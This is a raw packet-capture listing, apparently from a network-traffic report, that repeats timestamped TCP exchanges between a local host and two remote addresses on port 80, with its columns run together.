                                                                                                                  Nov 30, 2024 01:55:28.229746103 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.229784966 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.230468988 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.230510950 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.230635881 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.230679035 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.231336117 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.231379986 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.231493950 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.231537104 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.232215881 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.232259035 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.232371092 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.232413054 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.233078003 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.233118057 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.233230114 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.233270884 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.233947992 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.233992100 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.234100103 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.234183073 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.234834909 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.234991074 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.235044003 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.235723019 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.235869884 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.235920906 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.236577988 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.236628056 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.236716032 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.237485886 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.237539053 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.237607002 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.238322973 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.238370895 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.238461971 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.239202976 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.239247084 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.239348888 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.239387989 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.240080118 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.240237951 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.240284920 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.240947008 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.241123915 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.241168022 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.241815090 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.241857052 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.241975069 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.242410898 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.242685080 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.242729902 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.242861986 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.242903948 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.243575096 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.243618965 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.243732929 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.243776083 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.244445086 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.244488001 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.244596004 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.244642019 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.245333910 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.245381117 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.245493889 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.245537996 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.246196985 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.246241093 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.246350050 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.246398926 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.247080088 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.247126102 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.247210979 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.247250080 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.247997046 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.248100042 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.248145103 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.248821974 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.248980999 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.249043941 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.249701977 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.249752998 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.249878883 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.249921083 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.250592947 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.250741005 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.250783920 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.251460075 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.251507998 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.251591921 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.251831055 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.252319098 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.252381086 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:28.252434969 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.252456903 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.252629995 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.253192902 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.253238916 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.253371954 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.254101992 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.254154921 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.254281044 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.254409075 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.254972935 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.255124092 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.255168915 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.255820990 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.255960941 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.256007910 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.256695032 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.256737947 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.256844997 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.257616997 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.257673979 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.257715940 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.258410931 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.258464098 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.258605003 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.258647919 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.259306908 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.259471893 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.259516001 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.260205030 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.260359049 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.260405064 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.261051893 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.261205912 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.261251926 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.261928082 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.261987925 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.262072086 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.262109041 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.262814045 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.262974024 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.263008118 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.263681889 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.263844013 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.263885021 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.264559031 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.264610052 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.264698029 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.265111923 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.265438080 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.265589952 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.265629053 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.266319036 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.266366005 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.266479015 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.266536951 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.267170906 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.267215967 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.267337084 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.267375946 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.267992973 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.268043041 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.372237921 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.424418926 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.424438000 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.424515963 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.424663067 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.424715042 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.424877882 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.424981117 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.425519943 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.425565958 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.425642967 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.425684929 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.426407099 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.426455021 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.426532030 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.426573992 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.427279949 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.427336931 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.427422047 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.427491903 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.428136110 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.428180933 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.428257942 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.428323984 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.429007053 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.429050922 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.429126978 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.429208994 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.429886103 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.429930925 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.430001020 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.430090904 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.430773020 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.430816889 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.430901051 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.430941105 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.431638002 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.431679964 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.431811094 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.431855917 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.432523966 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.432564020 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.432635069 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.432729006 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.433387041 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.433432102 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.433502913 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.433588982 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.434257030 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.434298992 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.434385061 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.434473038 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.435147047 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.435209036 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.435276985 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.435326099 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.436034918 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.436078072 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.436245918 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.436284065 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.436885118 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.436930895 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.437012911 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.437053919 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.437783957 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.437832117 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.437944889 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.437990904 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.438679934 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.438725948 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.438754082 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.438793898 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.439522028 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.439565897 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.439621925 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.439661026 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.440398932 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.440443039 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.440473080 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.440512896 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.441246033 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.441291094 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.441365957 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.441406965 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.442143917 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.442187071 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.442269087 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.442308903 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.443043947 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.443089008 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.443172932 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.443212032 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.443934917 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.443980932 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.444046974 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.444086075 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.444767952 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.444808006 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.444906950 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.444947004 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.445636034 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.445694923 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.445748091 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.445786953 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.446511984 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.446557999 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.446603060 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.446645021 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.447393894 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.447438955 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.447496891 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.447535038 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.448255062 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.448293924 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.448358059 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.448399067 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.449132919 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.449176073 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.449243069 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.449284077 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.450010061 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.450053930 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.450114965 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.450155973 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.450880051 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.450920105 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.450994015 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.451031923 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.451726913 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.451771021 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.451889992 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.451940060 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.452621937 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.452665091 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.452747107 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.452791929 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.453495979 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.453535080 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.453619957 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.453658104 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.454611063 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.454655886 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.454730988 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.454770088 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.455262899 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.455300093 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.455367088 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.455406904 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.456121922 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.456180096 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.456224918 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.456377029 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.456979036 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.457024097 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:28.457102060 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:28.457143068 CET4974080192.168.2.4185.215.113.84
